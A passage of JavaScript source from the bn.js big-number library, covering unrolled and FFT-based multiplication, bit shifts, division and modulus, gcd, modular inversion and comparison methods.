        c = (hi + (mid >>> 13) | 0) + (w12 >>> 26) | 0;
        w12 &= 0x3ffffff;
        /* k = 13 */ lo = Math.imul(al9, bl4);
        mid = Math.imul(al9, bh4);
        mid = mid + Math.imul(ah9, bl4) | 0;
        hi = Math.imul(ah9, bh4);
        lo = lo + Math.imul(al8, bl5) | 0;
        mid = mid + Math.imul(al8, bh5) | 0;
        mid = mid + Math.imul(ah8, bl5) | 0;
        hi = hi + Math.imul(ah8, bh5) | 0;
        lo = lo + Math.imul(al7, bl6) | 0;
        mid = mid + Math.imul(al7, bh6) | 0;
        mid = mid + Math.imul(ah7, bl6) | 0;
        hi = hi + Math.imul(ah7, bh6) | 0;
        lo = lo + Math.imul(al6, bl7) | 0;
        mid = mid + Math.imul(al6, bh7) | 0;
        mid = mid + Math.imul(ah6, bl7) | 0;
        hi = hi + Math.imul(ah6, bh7) | 0;
        lo = lo + Math.imul(al5, bl8) | 0;
        mid = mid + Math.imul(al5, bh8) | 0;
        mid = mid + Math.imul(ah5, bl8) | 0;
        hi = hi + Math.imul(ah5, bh8) | 0;
        lo = lo + Math.imul(al4, bl9) | 0;
        mid = mid + Math.imul(al4, bh9) | 0;
        mid = mid + Math.imul(ah4, bl9) | 0;
        hi = hi + Math.imul(ah4, bh9) | 0;
        var w13 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w13 >>> 26) | 0;
        w13 &= 0x3ffffff;
        /* k = 14 */ lo = Math.imul(al9, bl5);
        mid = Math.imul(al9, bh5);
        mid = mid + Math.imul(ah9, bl5) | 0;
        hi = Math.imul(ah9, bh5);
        lo = lo + Math.imul(al8, bl6) | 0;
        mid = mid + Math.imul(al8, bh6) | 0;
        mid = mid + Math.imul(ah8, bl6) | 0;
        hi = hi + Math.imul(ah8, bh6) | 0;
        lo = lo + Math.imul(al7, bl7) | 0;
        mid = mid + Math.imul(al7, bh7) | 0;
        mid = mid + Math.imul(ah7, bl7) | 0;
        hi = hi + Math.imul(ah7, bh7) | 0;
        lo = lo + Math.imul(al6, bl8) | 0;
        mid = mid + Math.imul(al6, bh8) | 0;
        mid = mid + Math.imul(ah6, bl8) | 0;
        hi = hi + Math.imul(ah6, bh8) | 0;
        lo = lo + Math.imul(al5, bl9) | 0;
        mid = mid + Math.imul(al5, bh9) | 0;
        mid = mid + Math.imul(ah5, bl9) | 0;
        hi = hi + Math.imul(ah5, bh9) | 0;
        var w14 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w14 >>> 26) | 0;
        w14 &= 0x3ffffff;
        /* k = 15 */ lo = Math.imul(al9, bl6);
        mid = Math.imul(al9, bh6);
        mid = mid + Math.imul(ah9, bl6) | 0;
        hi = Math.imul(ah9, bh6);
        lo = lo + Math.imul(al8, bl7) | 0;
        mid = mid + Math.imul(al8, bh7) | 0;
        mid = mid + Math.imul(ah8, bl7) | 0;
        hi = hi + Math.imul(ah8, bh7) | 0;
        lo = lo + Math.imul(al7, bl8) | 0;
        mid = mid + Math.imul(al7, bh8) | 0;
        mid = mid + Math.imul(ah7, bl8) | 0;
        hi = hi + Math.imul(ah7, bh8) | 0;
        lo = lo + Math.imul(al6, bl9) | 0;
        mid = mid + Math.imul(al6, bh9) | 0;
        mid = mid + Math.imul(ah6, bl9) | 0;
        hi = hi + Math.imul(ah6, bh9) | 0;
        var w15 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w15 >>> 26) | 0;
        w15 &= 0x3ffffff;
        /* k = 16 */ lo = Math.imul(al9, bl7);
        mid = Math.imul(al9, bh7);
        mid = mid + Math.imul(ah9, bl7) | 0;
        hi = Math.imul(ah9, bh7);
        lo = lo + Math.imul(al8, bl8) | 0;
        mid = mid + Math.imul(al8, bh8) | 0;
        mid = mid + Math.imul(ah8, bl8) | 0;
        hi = hi + Math.imul(ah8, bh8) | 0;
        lo = lo + Math.imul(al7, bl9) | 0;
        mid = mid + Math.imul(al7, bh9) | 0;
        mid = mid + Math.imul(ah7, bl9) | 0;
        hi = hi + Math.imul(ah7, bh9) | 0;
        var w16 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w16 >>> 26) | 0;
        w16 &= 0x3ffffff;
        /* k = 17 */ lo = Math.imul(al9, bl8);
        mid = Math.imul(al9, bh8);
        mid = mid + Math.imul(ah9, bl8) | 0;
        hi = Math.imul(ah9, bh8);
        lo = lo + Math.imul(al8, bl9) | 0;
        mid = mid + Math.imul(al8, bh9) | 0;
        mid = mid + Math.imul(ah8, bl9) | 0;
        hi = hi + Math.imul(ah8, bh9) | 0;
        var w17 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w17 >>> 26) | 0;
        w17 &= 0x3ffffff;
        /* k = 18 */ lo = Math.imul(al9, bl9);
        mid = Math.imul(al9, bh9);
        mid = mid + Math.imul(ah9, bl9) | 0;
        hi = Math.imul(ah9, bh9);
        var w18 = (c + lo | 0) + ((mid & 0x1fff) << 13) | 0;
        c = (hi + (mid >>> 13) | 0) + (w18 >>> 26) | 0;
        w18 &= 0x3ffffff;
        o[0] = w0;
        o[1] = w1;
        o[2] = w2;
        o[3] = w3;
        o[4] = w4;
        o[5] = w5;
        o[6] = w6;
        o[7] = w7;
        o[8] = w8;
        o[9] = w9;
        o[10] = w10;
        o[11] = w11;
        o[12] = w12;
        o[13] = w13;
        o[14] = w14;
        o[15] = w15;
        o[16] = w16;
        o[17] = w17;
        o[18] = w18;
        if (c !== 0) {
            o[19] = c;
            out.length++;
        }
        return out;
    };
    // Polyfill comb
    if (!Math.imul) comb10MulTo = smallMulTo;
    function bigMulTo(self, num, out) {
        out.negative = num.negative ^ self.negative;
        out.length = self.length + num.length;
        var carry = 0;
        var hncarry = 0;
        for(var k = 0; k < out.length - 1; k++){
            // Sum all words with the same `i + j = k` and accumulate `ncarry`,
            // note that ncarry could be >= 0x3ffffff
            var ncarry = hncarry;
            hncarry = 0;
            var rword = carry & 0x3ffffff;
            var maxJ = Math.min(k, num.length - 1);
            for(var j = Math.max(0, k - self.length + 1); j <= maxJ; j++){
                var i = k - j;
                var a = self.words[i] | 0;
                var b = num.words[j] | 0;
                var r = a * b;
                var lo = r & 0x3ffffff;
                ncarry = ncarry + (r / 0x4000000 | 0) | 0;
                lo = lo + rword | 0;
                rword = lo & 0x3ffffff;
                ncarry = ncarry + (lo >>> 26) | 0;
                hncarry += ncarry >>> 26;
                ncarry &= 0x3ffffff;
            }
            out.words[k] = rword;
            carry = ncarry;
            ncarry = hncarry;
        }
        if (carry !== 0) out.words[k] = carry;
        else out.length--;
        return out._strip();
    }
    function jumboMulTo(self, num, out) {
        // Temporary disable, see https://github.com/indutny/bn.js/issues/211
        // var fftm = new FFTM();
        // return fftm.mulp(self, num, out);
        return bigMulTo(self, num, out);
    }
    BN.prototype.mulTo = function mulTo(num, out) {
        var res;
        var len = this.length + num.length;
        if (this.length === 10 && num.length === 10) res = comb10MulTo(this, num, out);
        else if (len < 63) res = smallMulTo(this, num, out);
        else if (len < 1024) res = bigMulTo(this, num, out);
        else res = jumboMulTo(this, num, out);
        return res;
    };
    // Cooley-Tukey algorithm for FFT
    // slightly revisited to rely on looping instead of recursion
    function FFTM(x, y) {
        this.x = x;
        this.y = y;
    }
    FFTM.prototype.makeRBT = function makeRBT(N) {
        var t = new Array(N);
        var l = BN.prototype._countBits(N) - 1;
        for(var i = 0; i < N; i++)t[i] = this.revBin(i, l, N);
        return t;
    };
    // Returns binary-reversed representation of `x`
    FFTM.prototype.revBin = function revBin(x, l, N) {
        if (x === 0 || x === N - 1) return x;
        var rb = 0;
        for(var i = 0; i < l; i++){
            rb |= (x & 1) << l - i - 1;
            x >>= 1;
        }
        return rb;
    };
    // Performs "tweedling" phase, therefore 'emulating'
    // behaviour of the recursive algorithm
    FFTM.prototype.permute = function permute(rbt, rws, iws, rtws, itws, N) {
        for(var i = 0; i < N; i++){
            rtws[i] = rws[rbt[i]];
            itws[i] = iws[rbt[i]];
        }
    };
    FFTM.prototype.transform = function transform(rws, iws, rtws, itws, N, rbt) {
        this.permute(rbt, rws, iws, rtws, itws, N);
        for(var s = 1; s < N; s <<= 1){
            var l = s << 1;
            var rtwdf = Math.cos(2 * Math.PI / l);
            var itwdf = Math.sin(2 * Math.PI / l);
            for(var p = 0; p < N; p += l){
                var rtwdf_ = rtwdf;
                var itwdf_ = itwdf;
                for(var j = 0; j < s; j++){
                    var re = rtws[p + j];
                    var ie = itws[p + j];
                    var ro = rtws[p + j + s];
                    var io = itws[p + j + s];
                    var rx = rtwdf_ * ro - itwdf_ * io;
                    io = rtwdf_ * io + itwdf_ * ro;
                    ro = rx;
                    rtws[p + j] = re + ro;
                    itws[p + j] = ie + io;
                    rtws[p + j + s] = re - ro;
                    itws[p + j + s] = ie - io;
                    /* jshint maxdepth : false */ if (j !== l) {
                        rx = rtwdf * rtwdf_ - itwdf * itwdf_;
                        itwdf_ = rtwdf * itwdf_ + itwdf * rtwdf_;
                        rtwdf_ = rx;
                    }
                }
            }
        }
    };
    FFTM.prototype.guessLen13b = function guessLen13b(n, m) {
        var N = Math.max(m, n) | 1;
        var odd = N & 1;
        var i = 0;
        for(N = N / 2 | 0; N; N = N >>> 1)i++;
        return 1 << i + 1 + odd;
    };
    FFTM.prototype.conjugate = function conjugate(rws, iws, N) {
        if (N <= 1) return;
        for(var i = 0; i < N / 2; i++){
            var t = rws[i];
            rws[i] = rws[N - i - 1];
            rws[N - i - 1] = t;
            t = iws[i];
            iws[i] = -iws[N - i - 1];
            iws[N - i - 1] = -t;
        }
    };
    FFTM.prototype.normalize13b = function normalize13b(ws, N) {
        var carry = 0;
        for(var i = 0; i < N / 2; i++){
            var w = Math.round(ws[2 * i + 1] / N) * 0x2000 + Math.round(ws[2 * i] / N) + carry;
            ws[i] = w & 0x3ffffff;
            if (w < 0x4000000) carry = 0;
            else carry = w / 0x4000000 | 0;
        }
        return ws;
    };
    FFTM.prototype.convert13b = function convert13b(ws, len, rws, N) {
        var carry = 0;
        for(var i = 0; i < len; i++){
            carry = carry + (ws[i] | 0);
            rws[2 * i] = carry & 0x1fff;
            carry = carry >>> 13;
            rws[2 * i + 1] = carry & 0x1fff;
            carry = carry >>> 13;
        }
        // Pad with zeroes
        for(i = 2 * len; i < N; ++i)rws[i] = 0;
        assert(carry === 0);
        assert((carry & -8192) === 0);
    };
    FFTM.prototype.stub = function stub(N) {
        var ph = new Array(N);
        for(var i = 0; i < N; i++)ph[i] = 0;
        return ph;
    };
    FFTM.prototype.mulp = function mulp(x, y, out) {
        var N = 2 * this.guessLen13b(x.length, y.length);
        var rbt = this.makeRBT(N);
        var _ = this.stub(N);
        var rws = new Array(N);
        var rwst = new Array(N);
        var iwst = new Array(N);
        var nrws = new Array(N);
        var nrwst = new Array(N);
        var niwst = new Array(N);
        var rmws = out.words;
        rmws.length = N;
        this.convert13b(x.words, x.length, rws, N);
        this.convert13b(y.words, y.length, nrws, N);
        this.transform(rws, _, rwst, iwst, N, rbt);
        this.transform(nrws, _, nrwst, niwst, N, rbt);
        for(var i = 0; i < N; i++){
            var rx = rwst[i] * nrwst[i] - iwst[i] * niwst[i];
            iwst[i] = rwst[i] * niwst[i] + iwst[i] * nrwst[i];
            rwst[i] = rx;
        }
        this.conjugate(rwst, iwst, N);
        this.transform(rwst, iwst, rmws, _, N, rbt);
        this.conjugate(rmws, _, N);
        this.normalize13b(rmws, N);
        out.negative = x.negative ^ y.negative;
        out.length = x.length + y.length;
        return out._strip();
    };
    // Multiply `this` by `num`
    BN.prototype.mul = function mul(num) {
        var out = new BN(null);
        out.words = new Array(this.length + num.length);
        return this.mulTo(num, out);
    };
    // Multiply employing FFT
    BN.prototype.mulf = function mulf(num) {
        var out = new BN(null);
        out.words = new Array(this.length + num.length);
        return jumboMulTo(this, num, out);
    };
    // In-place Multiplication
    BN.prototype.imul = function imul(num) {
        return this.clone().mulTo(num, this);
    };
    BN.prototype.imuln = function imuln(num) {
        var isNegNum = num < 0;
        if (isNegNum) num = -num;
        assert(typeof num === "number");
        assert(num < 0x4000000);
        // Carry
        var carry = 0;
        for(var i = 0; i < this.length; i++){
            var w = (this.words[i] | 0) * num;
            var lo = (w & 0x3ffffff) + (carry & 0x3ffffff);
            carry >>= 26;
            carry += w / 0x4000000 | 0;
            // NOTE: lo is 27bit maximum
            carry += lo >>> 26;
            this.words[i] = lo & 0x3ffffff;
        }
        if (carry !== 0) {
            this.words[i] = carry;
            this.length++;
        }
        return isNegNum ? this.ineg() : this;
    };
    BN.prototype.muln = function muln(num) {
        return this.clone().imuln(num);
    };
    // `this` * `this`
    BN.prototype.sqr = function sqr() {
        return this.mul(this);
    };
    // `this` * `this` in-place
    BN.prototype.isqr = function isqr() {
        return this.imul(this.clone());
    };
    // Math.pow(`this`, `num`)
    BN.prototype.pow = function pow(num) {
        var w = toBitArray(num);
        if (w.length === 0) return new BN(1);
        // Skip leading zeroes
        var res = this;
        for(var i = 0; i < w.length; i++, res = res.sqr()){
            if (w[i] !== 0) break;
        }
        if (++i < w.length) for(var q = res.sqr(); i < w.length; i++, q = q.sqr()){
            if (w[i] === 0) continue;
            res = res.mul(q);
        }
        return res;
    };
    // Shift-left in-place
    BN.prototype.iushln = function iushln(bits) {
        assert(typeof bits === "number" && bits >= 0);
        var r = bits % 26;
        var s = (bits - r) / 26;
        var carryMask = 0x3ffffff >>> 26 - r << 26 - r;
        var i;
        if (r !== 0) {
            var carry = 0;
            for(i = 0; i < this.length; i++){
                var newCarry = this.words[i] & carryMask;
                var c = (this.words[i] | 0) - newCarry << r;
                this.words[i] = c | carry;
                carry = newCarry >>> 26 - r;
            }
            if (carry) {
                this.words[i] = carry;
                this.length++;
            }
        }
        if (s !== 0) {
            for(i = this.length - 1; i >= 0; i--)this.words[i + s] = this.words[i];
            for(i = 0; i < s; i++)this.words[i] = 0;
            this.length += s;
        }
        return this._strip();
    };
    BN.prototype.ishln = function ishln(bits) {
        // TODO(indutny): implement me
        assert(this.negative === 0);
        return this.iushln(bits);
    };
    // Shift-right in-place
    // NOTE: `hint` is a lowest bit before trailing zeroes
    // NOTE: if `extended` is present - it will be filled with destroyed bits
    BN.prototype.iushrn = function iushrn(bits, hint, extended) {
        assert(typeof bits === "number" && bits >= 0);
        var h;
        if (hint) h = (hint - hint % 26) / 26;
        else h = 0;
        var r = bits % 26;
        var s = Math.min((bits - r) / 26, this.length);
        var mask = 0x3ffffff ^ 0x3ffffff >>> r << r;
        var maskedWords = extended;
        h -= s;
        h = Math.max(0, h);
        // Extended mode, copy masked part
        if (maskedWords) {
            for(var i = 0; i < s; i++)maskedWords.words[i] = this.words[i];
            maskedWords.length = s;
        }
        if (s === 0) ;
        else if (this.length > s) {
            this.length -= s;
            for(i = 0; i < this.length; i++)this.words[i] = this.words[i + s];
        } else {
            this.words[0] = 0;
            this.length = 1;
        }
        var carry = 0;
        for(i = this.length - 1; i >= 0 && (carry !== 0 || i >= h); i--){
            var word = this.words[i] | 0;
            this.words[i] = carry << 26 - r | word >>> r;
            carry = word & mask;
        }
        // Push carried bits as a mask
        if (maskedWords && carry !== 0) maskedWords.words[maskedWords.length++] = carry;
        if (this.length === 0) {
            this.words[0] = 0;
            this.length = 1;
        }
        return this._strip();
    };
    BN.prototype.ishrn = function ishrn(bits, hint, extended) {
        // TODO(indutny): implement me
        assert(this.negative === 0);
        return this.iushrn(bits, hint, extended);
    };
    // Shift-left
    BN.prototype.shln = function shln(bits) {
        return this.clone().ishln(bits);
    };
    BN.prototype.ushln = function ushln(bits) {
        return this.clone().iushln(bits);
    };
    // Shift-right
    BN.prototype.shrn = function shrn(bits) {
        return this.clone().ishrn(bits);
    };
    BN.prototype.ushrn = function ushrn(bits) {
        return this.clone().iushrn(bits);
    };
    // Test if n bit is set
    BN.prototype.testn = function testn(bit) {
        assert(typeof bit === "number" && bit >= 0);
        var r = bit % 26;
        var s = (bit - r) / 26;
        var q = 1 << r;
        // Fast case: bit is much higher than all existing words
        if (this.length <= s) return false;
        // Check bit and return
        var w = this.words[s];
        return !!(w & q);
    };
    // Return only lowers bits of number (in-place)
    BN.prototype.imaskn = function imaskn(bits) {
        assert(typeof bits === "number" && bits >= 0);
        var r = bits % 26;
        var s = (bits - r) / 26;
        assert(this.negative === 0, "imaskn works only with positive numbers");
        if (this.length <= s) return this;
        if (r !== 0) s++;
        this.length = Math.min(s, this.length);
        if (r !== 0) {
            var mask = 0x3ffffff ^ 0x3ffffff >>> r << r;
            this.words[this.length - 1] &= mask;
        }
        return this._strip();
    };
    // Return only lowers bits of number
    BN.prototype.maskn = function maskn(bits) {
        return this.clone().imaskn(bits);
    };
    // Add plain number `num` to `this`
    BN.prototype.iaddn = function iaddn(num) {
        assert(typeof num === "number");
        assert(num < 0x4000000);
        if (num < 0) return this.isubn(-num);
        // Possible sign change
        if (this.negative !== 0) {
            if (this.length === 1 && (this.words[0] | 0) <= num) {
                this.words[0] = num - (this.words[0] | 0);
                this.negative = 0;
                return this;
            }
            this.negative = 0;
            this.isubn(num);
            this.negative = 1;
            return this;
        }
        // Add without checks
        return this._iaddn(num);
    };
    BN.prototype._iaddn = function _iaddn(num) {
        this.words[0] += num;
        // Carry
        for(var i = 0; i < this.length && this.words[i] >= 0x4000000; i++){
            this.words[i] -= 0x4000000;
            if (i === this.length - 1) this.words[i + 1] = 1;
            else this.words[i + 1]++;
        }
        this.length = Math.max(this.length, i + 1);
        return this;
    };
    // Subtract plain number `num` from `this`
    BN.prototype.isubn = function isubn(num) {
        assert(typeof num === "number");
        assert(num < 0x4000000);
        if (num < 0) return this.iaddn(-num);
        if (this.negative !== 0) {
            this.negative = 0;
            this.iaddn(num);
            this.negative = 1;
            return this;
        }
        this.words[0] -= num;
        if (this.length === 1 && this.words[0] < 0) {
            this.words[0] = -this.words[0];
            this.negative = 1;
        } else // Carry
        for(var i = 0; i < this.length && this.words[i] < 0; i++){
            this.words[i] += 0x4000000;
            this.words[i + 1] -= 1;
        }
        return this._strip();
    };
    BN.prototype.addn = function addn(num) {
        return this.clone().iaddn(num);
    };
    BN.prototype.subn = function subn(num) {
        return this.clone().isubn(num);
    };
    BN.prototype.iabs = function iabs() {
        this.negative = 0;
        return this;
    };
    BN.prototype.abs = function abs() {
        return this.clone().iabs();
    };
    BN.prototype._ishlnsubmul = function _ishlnsubmul(num, mul, shift) {
        var len = num.length + shift;
        var i;
        this._expand(len);
        var w;
        var carry = 0;
        for(i = 0; i < num.length; i++){
            w = (this.words[i + shift] | 0) + carry;
            var right = (num.words[i] | 0) * mul;
            w -= right & 0x3ffffff;
            carry = (w >> 26) - (right / 0x4000000 | 0);
            this.words[i + shift] = w & 0x3ffffff;
        }
        for(; i < this.length - shift; i++){
            w = (this.words[i + shift] | 0) + carry;
            carry = w >> 26;
            this.words[i + shift] = w & 0x3ffffff;
        }
        if (carry === 0) return this._strip();
        // Subtraction overflow
        assert(carry === -1);
        carry = 0;
        for(i = 0; i < this.length; i++){
            w = -(this.words[i] | 0) + carry;
            carry = w >> 26;
            this.words[i] = w & 0x3ffffff;
        }
        this.negative = 1;
        return this._strip();
    };
    BN.prototype._wordDiv = function _wordDiv(num, mode) {
        var shift = this.length - num.length;
        var a = this.clone();
        var b = num;
        // Normalize
        var bhi = b.words[b.length - 1] | 0;
        var bhiBits = this._countBits(bhi);
        shift = 26 - bhiBits;
        if (shift !== 0) {
            b = b.ushln(shift);
            a.iushln(shift);
            bhi = b.words[b.length - 1] | 0;
        }
        // Initialize quotient
        var m = a.length - b.length;
        var q;
        if (mode !== "mod") {
            q = new BN(null);
            q.length = m + 1;
            q.words = new Array(q.length);
            for(var i = 0; i < q.length; i++)q.words[i] = 0;
        }
        var diff = a.clone()._ishlnsubmul(b, 1, m);
        if (diff.negative === 0) {
            a = diff;
            if (q) q.words[m] = 1;
        }
        for(var j = m - 1; j >= 0; j--){
            var qj = (a.words[b.length + j] | 0) * 0x4000000 + (a.words[b.length + j - 1] | 0);
            // NOTE: (qj / bhi) is (0x3ffffff * 0x4000000 + 0x3ffffff) / 0x2000000 max
            // (0x7ffffff)
            qj = Math.min(qj / bhi | 0, 0x3ffffff);
            a._ishlnsubmul(b, qj, j);
            while(a.negative !== 0){
                qj--;
                a.negative = 0;
                a._ishlnsubmul(b, 1, j);
                if (!a.isZero()) a.negative ^= 1;
            }
            if (q) q.words[j] = qj;
        }
        if (q) q._strip();
        a._strip();
        // Denormalize
        if (mode !== "div" && shift !== 0) a.iushrn(shift);
        return {
            div: q || null,
            mod: a
        };
    };
    // NOTE: 1) `mode` can be set to `mod` to request mod only,
    //       to `div` to request div only, or be absent to
    //       request both div & mod
    //       2) `positive` is true if unsigned mod is requested
    BN.prototype.divmod = function divmod(num, mode, positive) {
        assert(!num.isZero());
        if (this.isZero()) return {
            div: new BN(0),
            mod: new BN(0)
        };
        var div, mod, res;
        if (this.negative !== 0 && num.negative === 0) {
            res = this.neg().divmod(num, mode);
            if (mode !== "mod") div = res.div.neg();
            if (mode !== "div") {
                mod = res.mod.neg();
                if (positive && mod.negative !== 0) mod.iadd(num);
            }
            return {
                div: div,
                mod: mod
            };
        }
        if (this.negative === 0 && num.negative !== 0) {
            res = this.divmod(num.neg(), mode);
            if (mode !== "mod") div = res.div.neg();
            return {
                div: div,
                mod: res.mod
            };
        }
        if ((this.negative & num.negative) !== 0) {
            res = this.neg().divmod(num.neg(), mode);
            if (mode !== "div") {
                mod = res.mod.neg();
                if (positive && mod.negative !== 0) mod.isub(num);
            }
            return {
                div: res.div,
                mod: mod
            };
        }
        // Both numbers are positive at this point
        // Strip both numbers to approximate shift value
        if (num.length > this.length || this.cmp(num) < 0) return {
            div: new BN(0),
            mod: this
        };
        // Very short reduction
        if (num.length === 1) {
            if (mode === "div") return {
                div: this.divn(num.words[0]),
                mod: null
            };
            if (mode === "mod") return {
                div: null,
                mod: new BN(this.modrn(num.words[0]))
            };
            return {
                div: this.divn(num.words[0]),
                mod: new BN(this.modrn(num.words[0]))
            };
        }
        return this._wordDiv(num, mode);
    };
    // Find `this` / `num`
    BN.prototype.div = function div(num) {
        return this.divmod(num, "div", false).div;
    };
    // Find `this` % `num`
    BN.prototype.mod = function mod(num) {
        return this.divmod(num, "mod", false).mod;
    };
    BN.prototype.umod = function umod(num) {
        return this.divmod(num, "mod", true).mod;
    };
    // Find Round(`this` / `num`)
    BN.prototype.divRound = function divRound(num) {
        var dm = this.divmod(num);
        // Fast case - exact division
        if (dm.mod.isZero()) return dm.div;
        var mod = dm.div.negative !== 0 ? dm.mod.isub(num) : dm.mod;
        var half = num.ushrn(1);
        var r2 = num.andln(1);
        var cmp = mod.cmp(half);
        // Round down
        if (cmp < 0 || r2 === 1 && cmp === 0) return dm.div;
        // Round up
        return dm.div.negative !== 0 ? dm.div.isubn(1) : dm.div.iaddn(1);
    };
    BN.prototype.modrn = function modrn(num) {
        var isNegNum = num < 0;
        if (isNegNum) num = -num;
        assert(num <= 0x3ffffff);
        var p = 67108864 % num;
        var acc = 0;
        for(var i = this.length - 1; i >= 0; i--)acc = (p * acc + (this.words[i] | 0)) % num;
        return isNegNum ? -acc : acc;
    };
    // WARNING: DEPRECATED
    BN.prototype.modn = function modn(num) {
        return this.modrn(num);
    };
    // In-place division by number
    BN.prototype.idivn = function idivn(num) {
        var isNegNum = num < 0;
        if (isNegNum) num = -num;
        assert(num <= 0x3ffffff);
        var carry = 0;
        for(var i = this.length - 1; i >= 0; i--){
            var w = (this.words[i] | 0) + carry * 0x4000000;
            this.words[i] = w / num | 0;
            carry = w % num;
        }
        this._strip();
        return isNegNum ? this.ineg() : this;
    };
    BN.prototype.divn = function divn(num) {
        return this.clone().idivn(num);
    };
    BN.prototype.egcd = function egcd(p) {
        assert(p.negative === 0);
        assert(!p.isZero());
        var x = this;
        var y = p.clone();
        if (x.negative !== 0) x = x.umod(p);
        else x = x.clone();
        // A * x + B * y = x
        var A = new BN(1);
        var B = new BN(0);
        // C * x + D * y = y
        var C = new BN(0);
        var D = new BN(1);
        var g = 0;
        while(x.isEven() && y.isEven()){
            x.iushrn(1);
            y.iushrn(1);
            ++g;
        }
        var yp = y.clone();
        var xp = x.clone();
        while(!x.isZero()){
            for(var i = 0, im = 1; (x.words[0] & im) === 0 && i < 26; ++i, im <<= 1);
            if (i > 0) {
                x.iushrn(i);
                while(i-- > 0){
                    if (A.isOdd() || B.isOdd()) {
                        A.iadd(yp);
                        B.isub(xp);
                    }
                    A.iushrn(1);
                    B.iushrn(1);
                }
            }
            for(var j = 0, jm = 1; (y.words[0] & jm) === 0 && j < 26; ++j, jm <<= 1);
            if (j > 0) {
                y.iushrn(j);
                while(j-- > 0){
                    if (C.isOdd() || D.isOdd()) {
                        C.iadd(yp);
                        D.isub(xp);
                    }
                    C.iushrn(1);
                    D.iushrn(1);
                }
            }
            if (x.cmp(y) >= 0) {
                x.isub(y);
                A.isub(C);
                B.isub(D);
            } else {
                y.isub(x);
                C.isub(A);
                D.isub(B);
            }
        }
        return {
            a: C,
            b: D,
            gcd: y.iushln(g)
        };
    };
    // This is reduced incarnation of the binary EEA
    // above, designated to invert members of the
    // _prime_ fields F(p) at a maximal speed
    BN.prototype._invmp = function _invmp(p) {
        assert(p.negative === 0);
        assert(!p.isZero());
        var a = this;
        var b = p.clone();
        if (a.negative !== 0) a = a.umod(p);
        else a = a.clone();
        var x1 = new BN(1);
        var x2 = new BN(0);
        var delta = b.clone();
        while(a.cmpn(1) > 0 && b.cmpn(1) > 0){
            for(var i = 0, im = 1; (a.words[0] & im) === 0 && i < 26; ++i, im <<= 1);
            if (i > 0) {
                a.iushrn(i);
                while(i-- > 0){
                    if (x1.isOdd()) x1.iadd(delta);
                    x1.iushrn(1);
                }
            }
            for(var j = 0, jm = 1; (b.words[0] & jm) === 0 && j < 26; ++j, jm <<= 1);
            if (j > 0) {
                b.iushrn(j);
                while(j-- > 0){
                    if (x2.isOdd()) x2.iadd(delta);
                    x2.iushrn(1);
                }
            }
            if (a.cmp(b) >= 0) {
                a.isub(b);
                x1.isub(x2);
            } else {
                b.isub(a);
                x2.isub(x1);
            }
        }
        var res;
        if (a.cmpn(1) === 0) res = x1;
        else res = x2;
        if (res.cmpn(0) < 0) res.iadd(p);
        return res;
    };
    BN.prototype.gcd = function gcd(num) {
        if (this.isZero()) return num.abs();
        if (num.isZero()) return this.abs();
        var a = this.clone();
        var b = num.clone();
        a.negative = 0;
        b.negative = 0;
        // Remove common factor of two
        for(var shift = 0; a.isEven() && b.isEven(); shift++){
            a.iushrn(1);
            b.iushrn(1);
        }
        do {
            while(a.isEven())a.iushrn(1);
            while(b.isEven())b.iushrn(1);
            var r = a.cmp(b);
            if (r < 0) {
                // Swap `a` and `b` to make `a` always bigger than `b`
                var t = a;
                a = b;
                b = t;
            } else if (r === 0 || b.cmpn(1) === 0) break;
            a.isub(b);
        }while (true);
        return b.iushln(shift);
    };
    // Invert number in the field F(num)
    BN.prototype.invm = function invm(num) {
        return this.egcd(num).a.umod(num);
    };
    BN.prototype.isEven = function isEven() {
        return (this.words[0] & 1) === 0;
    };
    BN.prototype.isOdd = function isOdd() {
        return (this.words[0] & 1) === 1;
    };
    // And first word and num
    BN.prototype.andln = function andln(num) {
        return this.words[0] & num;
    };
    // Increment at the bit position in-line
    BN.prototype.bincn = function bincn(bit) {
        assert(typeof bit === "number");
        var r = bit % 26;
        var s = (bit - r) / 26;
        var q = 1 << r;
        // Fast case: bit is much higher than all existing words
        if (this.length <= s) {
            this._expand(s + 1);
            this.words[s] |= q;
            return this;
        }
        // Add bit and propagate, if needed
        var carry = q;
        for(var i = s; carry !== 0 && i < this.length; i++){
            var w = this.words[i] | 0;
            w += carry;
            carry = w >>> 26;
            w &= 0x3ffffff;
            this.words[i] = w;
        }
        if (carry !== 0) {
            this.words[i] = carry;
            this.length++;
        }
        return this;
    };
    BN.prototype.isZero = function isZero() {
        return this.length === 1 && this.words[0] === 0;
    };
    BN.prototype.cmpn = function cmpn(num) {
        var negative = num < 0;
        if (this.negative !== 0 && !negative) return -1;
        if (this.negative === 0 && negative) return 1;
        this._strip();
        var res;
        if (this.length > 1) res = 1;
        else {
            if (negative) num = -num;
            assert(num <= 0x3ffffff, "Number is too big");
            var w = this.words[0] | 0;
            res = w === num ? 0 : w < num ? -1 : 1;
        }
        if (this.negative !== 0) return -res | 0;
        return res;
    };
    // Compare two numbers and return:
    // 1 - if `this` > `num`
    // 0 - if `this` == `num`
    // -1 - if `this` < `num`
    BN.prototype.cmp = function cmp(num) {
        if (this.negative !== 0 && num.negative === 0) return -1;
        if (this.negative === 0 && num.negative !== 0) return 1;
        var res = this.ucmp(num);
        if (this.negative !== 0) return -res | 0;
        return res;
    };
    // Unsigned comparison
    BN.prototype.ucmp = function ucmp(num) {
        // At this point both numbers have the same sign
        if (this.length > num.length) return 1;
        if (this.length < num.length) return -1;
        var res = 0;
        for(var i = this.length - 1; i >= 0; i--){
            var a = this.words[i] | 0;
            var b = num.words[i] | 0;
            if (a === b) continue;
            if (a < b) res = -1;
            else if (a > b) res = 1;
            break;
        }
        return res;
    };
    BN.prototype.gtn = function gtn(num) {
        return this.cmpn(num) === 1;
    };
    BN.prototype.gt = function gt(num) {
        return this.cmp(num) === 1;
    };
    BN.prototype.gten = function gten(num) {
        return this.cmpn(num) >= 0;
    };
    BN.prototype.gte = function gte(num) {
        return this.cmp(num) >= 0;
    };
    BN.prototype.ltn = function ltn(num) {
        return this.cmpn(num) === -1;
    };
    BN.prototype.lt = function lt(num) {
        return this.cmp(num) === -1;
    };
